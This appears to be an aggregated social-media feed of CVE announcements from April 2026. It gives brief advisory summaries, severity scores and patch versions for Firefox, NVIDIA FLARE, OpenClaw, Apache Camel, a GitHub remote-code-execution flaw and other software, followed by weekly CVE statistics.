Sandbox escape due to incorrect boundary conditions in the WebRTC: Networking component. This vulnerability was fixed in Firefox ESR 140.10.1.
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-7321/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🔴 CVE-2026-7321 - Critical (9.6)
Sandbox escape due to incorrect boundary conditions in the WebRTC: Networking component. This vulnerability was fixed in Firefox ESR 140.10.1.
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-7321/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-04-28T20:10:59.913000
2 posts
🟠 CVE-2026-7320 - High (7.5)
Information disclosure due to incorrect boundary conditions in the Audio/Video component. This vulnerability was fixed in Firefox 150.0.1, Firefox ESR 140.10.1, and Firefox ESR 115.35.1.
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-7320/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2026-7320 - High (7.5)
Information disclosure due to incorrect boundary conditions in the Audio/Video component. This vulnerability was fixed in Firefox 150.0.1, Firefox ESR 140.10.1, and Firefox ESR 115.35.1.
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-7320/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-04-28T20:10:42.070000
4 posts
🟠 CVE-2026-24186 - High (8.8)
NVIDIA FLARE SDK contains a vulnerability in FOBS, where an attacker may cause deserialization of untrusted data by sending a malicious FOBS- encoded message. A successful exploit of this vulnerability might lead to code execution.
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-24186/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##Nvidia has posted two advisories:
"NVIDIA NVFlare Dashboard contains a vulnerability in the user management and authentication system where an unauthenticated attacker may cause authorization bypass through user-controlled key."
- Critical: CVE-2026-24178, CVE-2026-24186, and CVE-2026-24204: NVIDIA FLARE SDK - April 2026 https://nvidia.custhelp.com/app/answers/detail/a_id/5819
"NVIDIA NemoClaw contains a vulnerability in the sandbox environment initialization component where a remote attacker may cause improper access control by sending prompt-injected content."
- High: CVE-2026-24222 and CVE-2026-24231: https://nvidia.custhelp.com/app/answers/detail/a_id/5837 #Nvidia #infoec #vulnerability
##🟠 CVE-2026-24186 - High (8.8)
NVIDIA FLARE SDK contains a vulnerability in FOBS, where an attacker may cause deserialization of untrusted data by sending a malicious FOBS- encoded message. A successful exploit of this vulnerability might lead to code execution.
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-24186/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##Nvidia has posted two advisories:
"NVIDIA NVFlare Dashboard contains a vulnerability in the user management and authentication system where an unauthenticated attacker may cause authorization bypass through user-controlled key."
- Critical: CVE-2026-24178, CVE-2026-24186, and CVE-2026-24204: NVIDIA FLARE SDK - April 2026 https://nvidia.custhelp.com/app/answers/detail/a_id/5819
"NVIDIA NemoClaw contains a vulnerability in the sandbox environment initialization component where a remote attacker may cause improper access control by sending prompt-injected content."
- High: CVE-2026-24222 and CVE-2026-24231: https://nvidia.custhelp.com/app/answers/detail/a_id/5837 #Nvidia #infoec #vulnerability
##updated 2026-04-28T20:10:42.070000
4 posts
🔴 CVE-2026-24178 - Critical (9.8)
NVIDIA NVFlare Dashboard contains a vulnerability in the user management and authentication system where an unauthenticated attacker may cause authorization bypass through user-controlled key. A successful exploit of this vulnerability may lead to...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-24178/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##Nvidia has posted two advisories:
"NVIDIA NVFlare Dashboard contains a vulnerability in the user management and authentication system where an unauthenticated attacker may cause authorization bypass through user-controlled key."
- Critical: CVE-2026-24178, CVE-2026-24186, and CVE-2026-24204: NVIDIA FLARE SDK - April 2026 https://nvidia.custhelp.com/app/answers/detail/a_id/5819
"NVIDIA NemoClaw contains a vulnerability in the sandbox environment initialization component where a remote attacker may cause improper access control by sending prompt-injected content."
- High: CVE-2026-24222 and CVE-2026-24231: https://nvidia.custhelp.com/app/answers/detail/a_id/5837 #Nvidia #infoec #vulnerability
##🔴 CVE-2026-24178 - Critical (9.8)
NVIDIA NVFlare Dashboard contains a vulnerability in the user management and authentication system where an unauthenticated attacker may cause authorization bypass through user-controlled key. A successful exploit of this vulnerability may lead to...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-24178/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##Nvidia has posted two advisories:
"NVIDIA NVFlare Dashboard contains a vulnerability in the user management and authentication system where an unauthenticated attacker may cause authorization bypass through user-controlled key."
- Critical: CVE-2026-24178, CVE-2026-24186, and CVE-2026-24204: NVIDIA FLARE SDK - April 2026 https://nvidia.custhelp.com/app/answers/detail/a_id/5819
"NVIDIA NemoClaw contains a vulnerability in the sandbox environment initialization component where a remote attacker may cause improper access control by sending prompt-injected content."
- High: CVE-2026-24222 and CVE-2026-24231: https://nvidia.custhelp.com/app/answers/detail/a_id/5837 #Nvidia #infoec #vulnerability
##updated 2026-04-28T20:10:42.070000
2 posts
Nvidia has posted two advisories:
"NVIDIA NVFlare Dashboard contains a vulnerability in the user management and authentication system where an unauthenticated attacker may cause authorization bypass through user-controlled key."
- Critical: CVE-2026-24178, CVE-2026-24186, and CVE-2026-24204: NVIDIA FLARE SDK - April 2026 https://nvidia.custhelp.com/app/answers/detail/a_id/5819
"NVIDIA NemoClaw contains a vulnerability in the sandbox environment initialization component where a remote attacker may cause improper access control by sending prompt-injected content."
- High: CVE-2026-24222 and CVE-2026-24231: https://nvidia.custhelp.com/app/answers/detail/a_id/5837 #Nvidia #infoec #vulnerability
##Nvidia has posted two advisories:
"NVIDIA NVFlare Dashboard contains a vulnerability in the user management and authentication system where an unauthenticated attacker may cause authorization bypass through user-controlled key."
- Critical: CVE-2026-24178, CVE-2026-24186, and CVE-2026-24204: NVIDIA FLARE SDK - April 2026 https://nvidia.custhelp.com/app/answers/detail/a_id/5819
"NVIDIA NemoClaw contains a vulnerability in the sandbox environment initialization component where a remote attacker may cause improper access control by sending prompt-injected content."
- High: CVE-2026-24222 and CVE-2026-24231: https://nvidia.custhelp.com/app/answers/detail/a_id/5837 #Nvidia #infoec #vulnerability
##updated 2026-04-28T20:10:23.367000
2 posts
🔴 CVE-2026-3893 - Critical (9.4)
The Carlson VASCO-B GNSS Receiver lacks an authentication mechanism,
allowing an attacker with network access to directly access and modify
its configuration and operational functions without needing credentials.
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-3893/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🔴 CVE-2026-3893 - Critical (9.4)
The Carlson VASCO-B GNSS Receiver lacks an authentication mechanism,
allowing an attacker with network access to directly access and modify
its configuration and operational functions without needing credentials.
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-3893/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-04-28T20:10:23.367000
2 posts
🟠 CVE-2026-41395 - High (7.5)
OpenClaw before 2026.3.28 contains a webhook replay vulnerability in Plivo V3 signature verification that canonicalizes query ordering for signatures but hashes raw URLs for replay detection. Attackers can reorder query parameters to bypass replay...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-41395/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2026-41395 - High (7.5)
OpenClaw before 2026.3.28 contains a webhook replay vulnerability in Plivo V3 signature verification that canonicalizes query ordering for signatures but hashes raw URLs for replay detection. Attackers can reorder query parameters to bypass replay...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-41395/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-04-28T20:10:23.367000
2 posts
🟠 CVE-2026-41404 - High (8.8)
OpenClaw before 2026.3.31 contains an incomplete scope-clearing vulnerability in trusted-proxy authentication mode that allows operator.admin privilege escalation. Attackers can exploit this by declaring operator scopes on non-Control-UI clients, ...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-41404/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2026-41404 - High (8.8)
OpenClaw before 2026.3.31 contains an incomplete scope-clearing vulnerability in trusted-proxy authentication mode that allows operator.admin privilege escalation. Attackers can exploit this by declaring operator scopes on non-Control-UI clients, ...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-41404/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-04-28T20:10:23.367000
2 posts
🟠 CVE-2026-41396 - High (7.8)
OpenClaw before 2026.3.31 allows workspace .env files to override the OPENCLAW_BUNDLED_PLUGINS_DIR environment variable, compromising plugin trust verification. Attackers with control over workspace configuration can inject malicious plugins by ov...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-41396/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2026-41396 - High (7.8)
OpenClaw before 2026.3.31 allows workspace .env files to override the OPENCLAW_BUNDLED_PLUGINS_DIR environment variable, compromising plugin trust verification. Attackers with control over workspace configuration can inject malicious plugins by ov...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-41396/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-04-28T20:10:23.367000
2 posts
🟠 CVE-2026-41912 - High (7.6)
OpenClaw before 2026.4.8 contains a server-side request forgery policy bypass vulnerability allowing attackers to trigger navigations bypassing normal SSRF checks. Attackers can exploit browser interactions to bypass SSRF protections and access re...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-41912/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2026-41912 - High (7.6)
OpenClaw before 2026.4.8 contains a server-side request forgery policy bypass vulnerability allowing attackers to trigger navigations bypassing normal SSRF checks. Attackers can exploit browser interactions to bypass SSRF protections and access re...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-41912/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-04-28T20:10:23.367000
2 posts
🟠 CVE-2026-41405 - High (7.5)
OpenClaw before 2026.3.31 parses MS Teams webhook request bodies before performing JWT validation, allowing unauthenticated attackers to trigger resource exhaustion. Remote attackers can send malicious Teams webhook payloads to exhaust server reso...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-41405/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2026-41405 - High (7.5)
OpenClaw before 2026.3.31 parses MS Teams webhook request bodies before performing JWT validation, allowing unauthenticated attackers to trigger resource exhaustion. Remote attackers can send malicious Teams webhook payloads to exhaust server reso...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-41405/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-04-28T20:10:23.367000
2 posts
🟠 CVE-2026-42422 - High (8.8)
OpenClaw before 2026.4.8 contains a role bypass vulnerability in the device.token.rotate function that allows minting tokens for unapproved roles. Attackers can bypass device role-upgrade pairing to preserve or mint roles and scopes that had not u...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-42422/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2026-42422 - High (8.8)
OpenClaw before 2026.4.8 contains a role bypass vulnerability in the device.token.rotate function that allows minting tokens for unapproved roles. Attackers can bypass device role-upgrade pairing to preserve or mint roles and scopes that had not u...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-42422/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-04-28T20:10:23.367000
2 posts
🟠 CVE-2026-41914 - High (8.5)
OpenClaw before 2026.4.8 contains a server-side request forgery vulnerability in QQ Bot media download paths that bypass SSRF protection. Attackers can exploit unprotected media fetch endpoints to access internal resources and bypass allowlist pol...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-41914/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2026-41914 - High (8.5)
OpenClaw before 2026.4.8 contains a server-side request forgery vulnerability in QQ Bot media download paths that bypass SSRF protection. Attackers can exploit unprotected media fetch endpoints to access internal resources and bypass allowlist pol...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-41914/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-04-28T20:10:23.367000
2 posts
🟠 CVE-2026-42423 - High (7.5)
OpenClaw before 2026.4.8 contains an approval-timeout fallback mechanism that bypasses strictInlineEval explicit-approval requirements on gateway and node exec hosts. Attackers can exploit this timeout fallback to execute inline eval commands that...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-42423/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2026-42423 - High (7.5)
OpenClaw before 2026.4.8 contains an approval-timeout fallback mechanism that bypasses strictInlineEval explicit-approval requirements on gateway and node exec hosts. Attackers can exploit this timeout fallback to execute inline eval commands that...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-42423/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-04-28T20:10:23.367000
2 posts
🟠 CVE-2026-42432 - High (7.8)
OpenClaw before 2026.4.8 contains a privilege escalation vulnerability allowing previously paired nodes to reconnect with exec-capable commands without operator.admin scope requirement. Attackers can bypass re-pairing authentication to execute pri...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-42432/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2026-42432 - High (7.8)
OpenClaw before 2026.4.8 contains a privilege escalation vulnerability allowing previously paired nodes to reconnect with exec-capable commands without operator.admin scope requirement. Attackers can bypass re-pairing authentication to execute pri...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-42432/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-04-28T20:10:23.367000
2 posts
🟠 CVE-2026-42431 - High (8.1)
OpenClaw before 2026.4.8 contains a security bypass vulnerability in node.invoke(browser.proxy) that allows mutation of persistent browser profiles. Attackers can exploit this path to circumvent the browser.request persistent profile-mutation guar...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-42431/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2026-42431 - High (8.1)
OpenClaw before 2026.4.8 contains a security bypass vulnerability in node.invoke(browser.proxy) that allows mutation of persistent browser profiles. Attackers can exploit this path to circumvent the browser.request persistent profile-mutation guar...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-42431/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-04-28T19:45:35.750000
1 posts
🟠 CVE-2026-6785 - High (8.1)
Memory safety bugs present in Firefox ESR 115.34, Firefox ESR 140.9, Thunderbird ESR 140.9, Firefox 149 and Thunderbird 149. Some of these bugs showed evidence of memory corruption and we presume that with enough effort some of these could have be...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-6785/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-04-28T19:45:26.663000
1 posts
🟠 CVE-2026-6786 - High (8.1)
Memory safety bugs present in Firefox ESR 140.9, Thunderbird ESR 140.9, Firefox 149 and Thunderbird 149. Some of these bugs showed evidence of memory corruption and we presume that with enough effort some of these could have been exploited to run ...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-6786/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-04-28T19:43:55.047000
1 posts
🔴 CVE-2026-40453 - Critical (9.9)
The fix for CVE-2025-27636 added setLowerCase(true) to HttpHeaderFilterStrategy so that case-variant header names such as 'CAmelExecCommandExecutable' are filtered out alongside 'CamelExecCommandExecutable'. The same setLowerCase(true) call was no...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-40453/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-04-28T19:43:29.363000
1 posts
🟠 CVE-2026-40048 - High (7.8)
The Camel-PQC FileBasedKeyLifecycleManager class deserializes the contents of `.key` files in the configured key directory using java.io.ObjectInputStream without applying any ObjectInputFilter or class-loading restrictions. The cast to `java.secu...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-40048/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-04-28T19:42:14.580000
1 posts
🔴 CVE-2026-33454 - Critical (9.4)
The Camel-Mail component is vulnerable to Camel message header injection. The custom header filter strategy used by the component (MailHeaderFilterStrategy) only filters the 'out' direction via setOutFilterStartsWith, while it does not configure t...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-33454/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-04-28T19:41:41.530000
1 posts
🟠 CVE-2026-40022 - High (8.2)
When authentication is enabled on the Apache Camel embedded HTTP server or embedded management server (camel-platform-http-main) and a non-root context path such as /api or /admin is configured via camel.server.path or camel.management.path, the B...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-40022/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-04-28T19:37:39.507000
40 posts
3 repos
https://github.com/5kr1pt/CVE-2026-3854
GitHub RCE Vulnerability: CVE-2026-3854 Breakdown: https://www.wiz.io/blog/github-rce-vulnerability-cve-2026-3854
Discussion: http://news.ycombinator.com/item?id=47936479
##GitHub RCE Vulnerability: CVE-2026-3854 Breakdown
Link: https://www.wiz.io/blog/github-rce-vulnerability-cve-2026-3854
Discussion: https://news.ycombinator.com/item?id=47936479
There should be a "but the service is never up to be exploited" reducer on the CVE score.
https://www.wiz.io/blog/github-rce-vulnerability-cve-2026-3854
Question about the GitHub RCE:
https://www.wiz.io/blog/github-rce-vulnerability-cve-2026-3854 says GHES patches were _released_ on 03/10.
https://github.blog/security/securing-the-git-push-pipeline-responding-to-a-critical-remote-code-execution-vulnerability/ says "we _prepared_ patches [...] and published CVE-2026-3854. These are _available today_".
So were GHES patches made available to customers at the time of CVE publication or only today, 1.5 months laster?
##GitHub RCE Vulnerability: CVE-2026-3854 Breakdown: https://www.wiz.io/blog/github-rce-vulnerability-cve-2026-3854
Discussion: http://news.ycombinator.com/item?id=47936479
##Wiz Research uncovers Remote Code Execution in GitHub.com and GitHub Enterprise Server (CVE-2026-3854) https://www.wiz.io/blog/github-rce-vulnerability-cve-2026-3854
##Critical GitHub Vulnerability CVE-2026-3854 Enables Remote Code Execution via Simple Git Push + Video
Introduction: A Silent Flaw Inside a Trusted Developer Ecosystem A newly discovered security vulnerability inside GitHub has exposed a dangerous weakness in one of the most widely trusted development platforms in the world. Identified as CVE-2026-3854, this flaw allows attackers to execute malicious code on backend systems using nothing more than a carefully crafted…
##GitHub RCE Vulnerability: CVE-2026-3854 Breakdown
https://news.ycombinator.com/item?id=47936479
Researchers Discover Critical GitHub CVE-2026-3854 RCE Flaw Exploitable via Single Git Push https://thehackernews.com/2026/04/researchers-discover-critical-github.html
##GitHub RCE Vulnerability: CVE-2026-3854 Breakdown https://lobste.rs/s/8fxgx7 #security #vibecoding
https://www.wiz.io/blog/github-rce-vulnerability-cve-2026-3854
GitHub RCE Vulnerability: CVE-2026-3854 Breakdown
Link: https://www.wiz.io/blog/github-rce-vulnerability-cve-2026-3854
Discussion: https://news.ycombinator.com/item?id=47936479
GitHub RCE Vulnerability: CVE-2026-3854 Breakdown
Link: https://www.wiz.io/blog/github-rce-vulnerability-cve-2026-3854
Discussion: https://news.ycombinator.com/item?id=47936479
GitHub RCE Vulnerability: CVE-2026-3854 Breakdown
Link: https://www.wiz.io/blog/github-rce-vulnerability-cve-2026-3854
Comments: https://news.ycombinator.com/item?id=47936479
@GossiTheDog Here's a non-Twitter link: https://www.wiz.io/blog/github-rce-vulnerability-cve-2026-3854
##HAHAHAHAHHAHAHAHAHAHAH https://www.wiz.io/blog/github-rce-vulnerability-cve-2026-3854
##Wiz got RCE on the cloud version of Github.com and access to every customer environment.
To do this they just reversed the on prem version and found a simple vuln.
https://www.wiz.io/blog/github-rce-vulnerability-cve-2026-3854
##GitHub RCE Vulnerability: CVE-2026-3854 Breakdown | Wiz Blog
https://www.wiz.io/blog/github-rce-vulnerability-cve-2026-3854
Read on HackerWorkspace: https://hackerworkspace.com/article/github-rce-vulnerability-cve-2026-3854-breakdown-wiz-blog
##🎉 BREAKING NEWS: #Hackers discover GitHub's secret Easter egg, allowing anyone with a pulse to play "Command & Conquer" on their backend servers! 😂 A riveting tale of how to hack into the Matrix using nothing but a 'git' command — surely, Neo is quaking in his boots. 🕶️
https://www.wiz.io/blog/github-rce-vulnerability-cve-2026-3854 #GitHub #EasterEgg #CommandAndConquer #HackingIntoTheMatrix #NeoQuaking #HackerNews #ngated
GitHub RCE Vulnerability: CVE-2026-3854 Breakdown
https://www.wiz.io/blog/github-rce-vulnerability-cve-2026-3854
#HackerNews #GitHub #RCE #Vulnerability #CVE-2026-3854 #Cybersecurity #Vulnerability #Analysis #InfoSec
##GitHub RCE Vulnerability: CVE-2026-3854 Breakdown - https://www.wiz.io/blog/github-rce-vulnerability-cve-2026-3854
##Updates**
- GitHub availability issues and service disruptions
- BookStack migrating from GitHub to Codeberg
- GitHub RCE vulnerability (CVE-2026-3854)
3. **Privacy and Security Concerns**
- Period tracking apps selling data to Meta
- Signal phishing attacks targeting journalists and politicians
- "Pack2TheRoot" Linux vulnerability affecting multiple distributions
4. **Tech Industry and Corporate News**
- Google’s Pentagon AI deal despite employee [2/4]
GitHub RCE Vulnerability: CVE-2026-3854 Breakdown
https://www.wiz.io/blog/github-rce-vulnerability-cve-2026-3854
##Beaucoup de gens vont sans doute résumer la faille de sécurité CVE-2026-3854 en « Mon Dieu, la totalité des logiciels hébergés sur GitHub ont peut-être été compromis ».
Mais, en fait, c'était déjà possible, Microsoft (propriétaire de GitHub) pouvait déjà tout modifier.
Tout ce qu'a permis CVE-2026-3854, si des gens l'ont exploité, c'est de démocratiser cette possibilité, en la rendant accessible à tous les gens ayant un compte GitHub.
https://www.wiz.io/blog/github-rce-vulnerability-cve-2026-3854
##GitHub RCE Vulnerability: CVE-2026-3854 Breakdown
Link: https://www.wiz.io/blog/github-rce-vulnerability-cve-2026-3854
Discussion: https://news.ycombinator.com/item?id=47936479
There should be a "but the service is never up to be exploited" reducer on the CVE score.
https://www.wiz.io/blog/github-rce-vulnerability-cve-2026-3854
Question about the GitHub RCE:
https://www.wiz.io/blog/github-rce-vulnerability-cve-2026-3854 says GHES patches were _released_ on 03/10.
https://github.blog/security/securing-the-git-push-pipeline-responding-to-a-critical-remote-code-execution-vulnerability/ says "we _prepared_ patches [...] and published CVE-2026-3854. These are _available today_".
So were GHES patches made available to customers at the time of CVE publication or only today, 1.5 months laster?
##Wiz Research uncovers Remote Code Execution in GitHub.com and GitHub Enterprise Server (CVE-2026-3854) https://www.wiz.io/blog/github-rce-vulnerability-cve-2026-3854
##GitHub RCE Vulnerability: CVE-2026-3854 Breakdown
https://news.ycombinator.com/item?id=47936479
GitHub RCE Vulnerability: CVE-2026-3854 Breakdown https://lobste.rs/s/8fxgx7 #security #vibecoding
https://www.wiz.io/blog/github-rce-vulnerability-cve-2026-3854
GitHub RCE Vulnerability: CVE-2026-3854 Breakdown
Link: https://www.wiz.io/blog/github-rce-vulnerability-cve-2026-3854
Discussion: https://news.ycombinator.com/item?id=47936479
GitHub RCE Vulnerability: CVE-2026-3854 Breakdown
Link: https://www.wiz.io/blog/github-rce-vulnerability-cve-2026-3854
Discussion: https://news.ycombinator.com/item?id=47936479
GitHub RCE Vulnerability: CVE-2026-3854 Breakdown
Link: https://www.wiz.io/blog/github-rce-vulnerability-cve-2026-3854
Comments: https://news.ycombinator.com/item?id=47936479
@GossiTheDog Here's a non-Twitter link: https://www.wiz.io/blog/github-rce-vulnerability-cve-2026-3854
##HAHAHAHAHHAHAHAHAHAHAH https://www.wiz.io/blog/github-rce-vulnerability-cve-2026-3854
##Wiz got RCE on the cloud version of Github.com and access to every customer environment.
To do this they just reversed the on prem version and found a simple vuln.
https://www.wiz.io/blog/github-rce-vulnerability-cve-2026-3854
##GitHub RCE Vulnerability: CVE-2026-3854 Breakdown | Wiz Blog
https://www.wiz.io/blog/github-rce-vulnerability-cve-2026-3854
Read on HackerWorkspace: https://hackerworkspace.com/article/github-rce-vulnerability-cve-2026-3854-breakdown-wiz-blog
##🎉 BREAKING NEWS: #Hackers discover GitHub's secret Easter egg, allowing anyone with a pulse to play "Command & Conquer" on their backend servers! 😂 A riveting tale of how to hack into the Matrix using nothing but a 'git' command — surely, Neo is quaking in his boots. 🕶️
https://www.wiz.io/blog/github-rce-vulnerability-cve-2026-3854 #GitHub #EasterEgg #CommandAndConquer #HackingIntoTheMatrix #NeoQuaking #HackerNews #ngated
GitHub RCE Vulnerability: CVE-2026-3854 Breakdown
https://www.wiz.io/blog/github-rce-vulnerability-cve-2026-3854
#HackerNews #GitHub #RCE #Vulnerability #CVE-2026-3854 #Cybersecurity #Vulnerability #Analysis #InfoSec
##GitHub RCE Vulnerability: CVE-2026-3854 Breakdown
https://www.wiz.io/blog/github-rce-vulnerability-cve-2026-3854
##Beaucoup de gens vont sans doute résumer la faille de sécurité CVE-2026-3854 en « Mon Dieu, la totalité des logiciels hébergés sur GitHub ont peut-être été compromis ».
Mais, en fait, c'était déjà possible, Microsoft (propriétaire de GitHub) pouvait déjà tout modifier.
Tout ce qu'a permis CVE-2026-3854, si des gens l'ont exploité, c'est de démocratiser cette possibilité, en la rendant accessible à tous les gens ayant un compte GitHub.
https://www.wiz.io/blog/github-rce-vulnerability-cve-2026-3854
##updated 2026-04-28T19:01:40.377000
4 posts
📰 Critical Unpatched RCE Flaw in Hugging Face's LeRobot AI Platform Puts Robotics Systems at Risk
🚨 CRITICAL FLAW: Unpatched RCE (CVE-2026-25874, CVSS 9.3) in Hugging Face's LeRobot AI platform. Unsafe deserialization allows unauthenticated attackers to execute code. #CVE202625874 #HuggingFace #AI #RCE
##📰 Critical Unpatched RCE Flaw in Hugging Face's LeRobot AI Platform Puts Robotics Systems at Risk
🚨 CRITICAL FLAW: Unpatched RCE (CVE-2026-25874, CVSS 9.3) in Hugging Face's LeRobot AI platform. Unsafe deserialization allows unauthenticated attackers to execute code. #CVE202625874 #HuggingFace #AI #RCE
##May I suggest...not exposing your robot control plane to the internet
##The vulnerability in question is CVE-2026-25874 (CVSS score: 9.3), which has been described as a case of untrusted data deserialization stemming from the use of the unsafe pickle format. https://thehackernews.com/2026/04/critical-cve-2026-25874-leaves-hugging.html
##updated 2026-04-28T18:45:44.107000
1 posts
🟠 CVE-2026-41364 - High (8.1)
OpenClaw before 2026.3.31 contains a symlink following vulnerability in SSH sandbox tar upload that allows remote attackers to write arbitrary files. Attackers can exploit this by uploading tar archives containing symlinks to escape the sandbox an...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-41364/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-04-28T18:44:10.780000
1 posts
🟠 CVE-2026-41371 - High (8.5)
OpenClaw before 2026.3.28 contains a privilege escalation vulnerability in chat.send that allows write-scoped gateway callers to trigger admin-only session reset operations. Attackers can rotate target sessions, archive prior transcript state, and...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-41371/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-04-28T18:43:10.593000
2 posts
⚠️ HIGH severity: OS command injection in JPCERT/CC LogonTracer before v2.0.0 (CVE-2026-33277). Logged-in users can run arbitrary OS commands. Restrict access & monitor logs until patch available. https://radar.offseq.com/threat/cve-2026-33277-improper-neutralization-of-special--31d12542 #OffSeq #Vuln #LogonTracer #Infosec
##🟠 CVE-2026-33277 - High (8.8)
An OS command Injection issue exists in LogonTracer prior to v2.0.0. An arbitrary OS command may be executed by a logged-in user.
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-33277/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-04-28T18:40:25.530000
2 posts
🟠 CVE-2026-41602 - High (7.5)
Integer Overflow or Wraparound vulnerability in Apache Thrift TFramedTransport Go language implementation
This issue affects Apache Thrift: before 0.23.0.
Users are recommended to upgrade to version 0.23.0, which fixes the issue.
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-41602/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2026-41602 - High (7.5)
Integer Overflow or Wraparound vulnerability in Apache Thrift TFramedTransport Go language implementation
This issue affects Apache Thrift: before 0.23.0.
Users are recommended to upgrade to version 0.23.0, which fixes the issue.
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-41602/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-04-28T18:31:36
1 posts
📈 CVE Published in last 7 days (2026-04-20 - 2026-04-27)
See more at https://secdb.nttzen.cloud/dashboard
Total CVEs: 1459
Severity:
- Critical: 124
- High: 358
- Medium: 586
- Low: 70
- None: 321
Status:
- : 40
- Analyzed: 313
- Awaiting Analysis: 570
- Deferred: 238
- Modified: 9
- Received: 124
- Rejected: 23
- Undergoing Analysis: 142
Top CNAs:
- GitHub, Inc.: 326
- kernel.org: 257
- VulnCheck: 119
- VulDB: 114
- Oracle: 102
- MITRE: 69
- Wordfence: 67
- Canonical Ltd.: 46
- Mozilla Corporation: 42
- N/A: 40
Top Affected Products:
- UNKNOWN: 1040
- Openclaw: 42
- Mozilla Firefox: 39
- Mozilla Thunderbird: 38
- Oracle Mysql Server: 25
- Wwbn Avideo: 18
- Flowiseai Flowise: 18
- Uutils Coreutils: 14
- Silextechnology Sd-330ac Firmware: 11
- Gitlab: 11
Top EPSS Score:
